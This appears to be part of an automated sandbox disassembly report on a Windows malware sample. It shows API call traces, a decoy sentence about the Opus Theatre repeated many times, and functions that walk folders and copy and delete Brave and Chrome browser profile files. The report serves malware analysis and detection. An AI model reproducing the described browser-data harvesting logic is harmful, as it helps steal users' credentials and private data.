                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
                                                                                          • strlen.MSVCRT ref: 00404740
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
                                                                                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
                                                                                          Strings
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                                                          • API String ID: 2127927946-2218711628
                                                                                          • Opcode ID: e597e8fc72bf404d1b85c08bbf82363fdc41d925fce3c21812b4f2230c6aabb6
                                                                                          • Instruction ID: 04d817b79848fc48b59ba69504da24c7d1b3191c531f4b94b2025844f93bc58f
                                                                                          • Opcode Fuzzy Hash: e597e8fc72bf404d1b85c08bbf82363fdc41d925fce3c21812b4f2230c6aabb6
                                                                                          • Instruction Fuzzy Hash: E941BB79740624EBC71C9FE5EC89B987F71AB4C712BA0C062F90299190C7F9D5019B3D
                                                                                          Function 0040BCB0 Relevance: 40.9, APIs: 17, Strings: 6, Instructions: 675fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1550 40bcb0-40bd42 call 41a110 call 41a2f0 call 41a380 call 41a270 call 41a1d0 * 2 call 41a110 * 2 call 41a4a0 1570 40bd81-40bd95 StrCmpCA 1550->1570 1571 40bd44-40bd7c call 41a1d0 * 6 call 401550 1550->1571 1572 40bd97-40bdab StrCmpCA 1570->1572 1573 40bdad 1570->1573 1614 40c64f-40c652 1571->1614 1572->1573 1575 40bdb2-40be2b call 41a1f0 call 41a2f0 call 41a380 * 2 call 41a270 call 41a1d0 * 3 1572->1575 1576 40c5f4-40c5fe 1573->1576 1622 40be31-40beb7 call 41a380 * 4 call 41a270 call 41a1d0 * 4 1575->1622 1623 40bebc-40bf3d call 41a380 * 4 call 41a270 call 41a1d0 * 4 1575->1623 1580 40c605-40c607 1576->1580 1580->1570 1583 40c60d-40c64a FindClose call 41a1d0 * 6 call 401550 1580->1583 1583->1614 1658 40bf42-40bf58 call 41a4a0 StrCmpCA 1622->1658 1623->1658 1662 40bf5e-40bf72 StrCmpCA 1658->1662 1663 40c11f-40c135 StrCmpCA 1658->1663 1662->1663 1664 40bf78-40c092 call 41a110 call 418600 call 41a380 call 41a2f0 call 41a270 call 41a1d0 * 3 call 41a4a0 * 2 CopyFileA call 41a110 call 41a380 * 2 call 41a270 call 41a1d0 * 2 call 41a170 call 409a10 1662->1664 1665 40c137-40c17a call 401590 call 41a170 * 3 call 40a1b0 1663->1665 1666 40c18a-40c1a0 StrCmpCA 1663->1666 1819 40c0e1-40c11a call 41a4a0 DeleteFileA call 41a410 call 41a4a0 call 41a1d0 * 2 1664->1819 1820 40c094-40c0dc call 41a170 call 401590 call 414c70 call 41a1d0 1664->1820 1727 40c17f-40c185 1665->1727 1668 40c1a2-40c1b9 call 41a4a0 StrCmpCA 1666->1668 1669 40c215-40c22d call 41a170 call 418830 1666->1669 1682 40c210 1668->1682 1683 40c1bb-40c20a call 401590 call 41a170 * 3 call 40a6c0 1668->1683 1693 40c233-40c23a 1669->1693 1694 40c306-40c31b StrCmpCA 1669->1694 1685 40c57a-40c583 1682->1685 1683->1682 1690 40c5e4-40c5ef call 41a410 * 2 1685->1690 1691 40c585-40c5d9 call 401590 call 41a170 * 2 call 41a110 call 40bcb0 1685->1691 1690->1576 1771 40c5de 1691->1771 1701 40c2a9-40c2f6 call 401590 call 41a170 call 41a110 call 41a170 call 40a6c0 1693->1701 1702 40c23c-40c243 1693->1702 1698 40c321-40c48a call 41a110 call 41a380 call 41a270 call 41a1d0 call 418600 call 41a2f0 call 41a270 call 41a1d0 * 2 call 41a4a0 * 2 CopyFileA call 401590 call 41a170 * 3 call 40ad70 call 401590 call 41a170 * 3 call 40b370 call 41a4a0 StrCmpCA 1694->1698 1699 40c50e-40c523 StrCmpCA 1694->1699 1851 40c4e4-40c4fc call 41a4a0 DeleteFileA call 41a410 1698->1851 1852 40c48c-40c4d9 call 401590 call 41a170 * 3 call 40b8e0 1698->1852 1699->1685 1708 40c525-40c56f call 401590 call 41a170 * 3 call 40b0b0 1699->1708 1775 40c2fb 1701->1775 1712 40c245-40c2a1 call 401590 call 41a170 call 41a110 call 41a170 call 40a6c0 1702->1712 1713 40c2a7 1702->1713 1778 40c574 1708->1778 1712->1713 1721 40c301 1713->1721 1721->1685 1727->1685 1771->1690 1775->1721 1778->1685 1819->1663 1820->1819 1859 40c501-40c50c call 41a1d0 1851->1859 1868 40c4de 1852->1868 1859->1685 1868->1851
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00420B17,00420B16,00000000,?,?,?,00421398,00420B0F), ref: 0040BD35
                                                                                          • StrCmpCA.SHLWAPI(?,0042139C), ref: 0040BD8D
                                                                                          • StrCmpCA.SHLWAPI(?,004213A0), ref: 0040BDA3
                                                                                          • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040C5FF
                                                                                          • FindClose.KERNEL32(000000FF), ref: 0040C611
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                          • String ID: Brave$Google Chrome$P2#v$Preferences$\Brave\Preferences$1#v
                                                                                          • API String ID: 3334442632-1392536997
                                                                                          • Opcode ID: 2b3ab046f24fe0bac011c9279e07f2c64685d7075d11687b7d753eb600e30850
                                                                                          • Instruction ID: 367325ed2970f14afd5354ed5b858d96e390655a4ce51a4c817116a6e2d4185c
                                                                                          • Opcode Fuzzy Hash: 2b3ab046f24fe0bac011c9279e07f2c64685d7075d11687b7d753eb600e30850
                                                                                          • Instruction Fuzzy Hash: 5142BB71901108A7CB14FBB1DC96EED733DAF84314F40456EF90A66191EF389B98CB9A
                                                                                          Function 004143F0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 172fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1869 4143f0-414436 wsprintfA 1871 414445-414459 StrCmpCA 1869->1871 1872 414438-414440 call 401550 1869->1872 1873 414471 1871->1873 1874 41445b-41446f StrCmpCA 1871->1874 1879 414680-414683 1872->1879 1877 41464f-414665 1873->1877 1874->1873 1876 414476-4144ad wsprintfA StrCmpCA 1874->1876 1880 4144cd-4144ed wsprintfA 1876->1880 1881 4144af-4144cb wsprintfA 1876->1881 1877->1871 1886 41466b-41467b FindClose call 401550 1877->1886 1882 4144f0-414506 PathMatchSpecA 1880->1882 1881->1882 1884 414617-414649 call 401590 call 4143f0 1882->1884 1885 41450c-4145bb call 418430 lstrcat * 5 CopyFileA call 41a110 call 409a10 1882->1885 1884->1877 1898 41460a-414611 DeleteFileA 1885->1898 1899 4145bd-414605 call 41a110 call 401590 call 414c70 call 41a1d0 1885->1899 1886->1879 1898->1884 1899->1898
                                                                                          APIs
                                                                                          • wsprintfA.USER32 ref: 0041440C
                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 00414423
                                                                                          • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
                                                                                          • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
                                                                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
                                                                                          • FindClose.KERNEL32(000000FF), ref: 00414672
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNextwsprintf
                                                                                          • String ID: %s\%s$%s\%s$%s\*$P2#v$1#v
                                                                                          • API String ID: 180737720-322404123
                                                                                          • Opcode ID: 17cad7da98d5d236d8490905c803be581254adcc9030182f58d63a0fb882b317
                                                                                          • Instruction ID: 93dd7dc702b7a0e0fded8c7806ce8f3795ba14a1618ae0d79b753d530a2b99d1
                                                                                          • Opcode Fuzzy Hash: 17cad7da98d5d236d8490905c803be581254adcc9030182f58d63a0fb882b317
                                                                                          • Instruction Fuzzy Hash: 11616571900618ABCB30EFA0DC49FEE737DBF48704F408599F50996151EB78AB858FA5
                                                                                          Function 004139B0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 133fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfA.USER32 ref: 004139D3
                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 004139EA
                                                                                          • StrCmpCA.SHLWAPI(?,00420F7C), ref: 00413A18
                                                                                          • StrCmpCA.SHLWAPI(?,00420F80), ref: 00413A2E
                                                                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00413B7C
                                                                                          • FindClose.KERNEL32(000000FF), ref: 00413B91
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNextwsprintf
                                                                                          • String ID: %s\%s$P2#v$1#v
                                                                                          • API String ID: 180737720-1025293131
                                                                                          • Opcode ID: e0733fba184414957b84623ac2ff11fb37c01327547932e1e3e5ae516d67a78e
                                                                                          • Instruction ID: 0978cf4b12305aed0c6265f700eadee139911ff0226e3ee7039eca2cb0139609
                                                                                          • Opcode Fuzzy Hash: e0733fba184414957b84623ac2ff11fb37c01327547932e1e3e5ae516d67a78e
                                                                                          • Instruction Fuzzy Hash: EE5188B1900218ABCB24EF60DC45EEE777DBF44304F40858DB60996151EB749BC5CF98
                                                                                          Function 0040F4F0 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 275fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042155C,00420D7E), ref: 0040F55E
                                                                                          • StrCmpCA.SHLWAPI(?,00421560), ref: 0040F5AF
